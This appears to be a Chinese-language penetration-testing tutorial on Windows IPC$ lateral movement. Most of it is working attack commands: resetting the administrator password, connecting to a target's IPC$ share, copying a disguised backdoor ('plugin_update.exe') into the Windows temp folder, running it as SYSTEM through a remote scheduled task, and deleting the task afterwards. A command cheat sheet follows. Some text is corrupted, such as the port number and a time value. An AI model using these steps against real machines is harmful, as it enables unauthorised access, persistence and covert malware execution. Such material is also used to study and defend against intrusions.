IPC$滲透使用

簡介

IPC$(Internet Process Connection)是共享"命名管道"的資源，它是爲了讓進程間通訊而開放的命名管道，經過提供可信任的用戶名和口令，鏈接雙方能夠創建安全的通道並以此通道進行加密數據的交換，從而實現對遠程計算機的訪問。

使用條件

1.開放了13九、445端口；
2.目標開啓ipc$文件共享；
3.獲取用戶帳號密碼。

測試過程

此測試前提是獲取了ipc$，
這裏測試的時候獲得的權限是system，而後建立了一個admin帳戶，給了administrators權限，但沒法複製文件過去，因而就改了administrator帳戶密碼（實戰中不建議更改，可讀取管理密碼後再用讀到的密碼）。
更改密碼：net user administrator "1qaz@WSX"

• 1.鏈接目標ipc$，將後門複製到目標機器上

net use \\193.168.1.12\ipc$ /user:administrator "1qaz@WSX"
copy plugin_update.exe \\193.168.1.12\c$\windows\temp\plugin_update.exe

• 2.建立自動任務，執行上傳的後門程序

# 查看目標機器時間
net time \\193.168.1.12
# 建立該時間以後的某個時刻自動執行任務，任務名 plugin_update
schtasks /create /tn "plugin_update" /tr c:\windows\temp\plugin_update.exe /sc once /st 16:32 /S 193.168.1.12 /RU System /u administrator /p "1qaz@WSX"
# 若是不想等，能夠當即運行後門程序
schtasks /run /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
# 刪除建立的任務
schtasks /F /delete /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"

接收端的目標機器已上線。

經常使用命令

# 1.鏈接
net use \\193.168.1.12\ipc$ /user:administrator "1qaz@WSX"
# 2.查看鏈接狀況
net use
# 3.查看目標主機共享資源
net view \\193.168.1.12
# 4.查看目標主機時間
net time \\193.168.1.12
# 5.查看目標主機的NetBIOS用戶（本身本機也需開啓）
nbtstat -A 193.168.1.12
# 6.刪除鏈接
net use \\193.168.1.12\ipc$ /del
# 7.文件上傳下載
copy plugin_update.exe \\193.168.1.12\c$\windows\temp\plugin_update.exe   
（上傳到目標的:c\windows\temp\目錄下）
copy \\127.0.0.1\c$\test.exe c:\
（下載到本地c盤下）
# 8.建立計劃任務
schtasks /create /tn "plugin_update" /tr c:\windows\temp\plugin_update.exe /sc once /st 1 6:32 /S 193.168.1.12 /RU System /u administrator /p "1qaz@WSX"
# 9.當即執行計劃任務
schtasks /run /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
# 10.刪除計劃任務
schtasks /F /delete /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"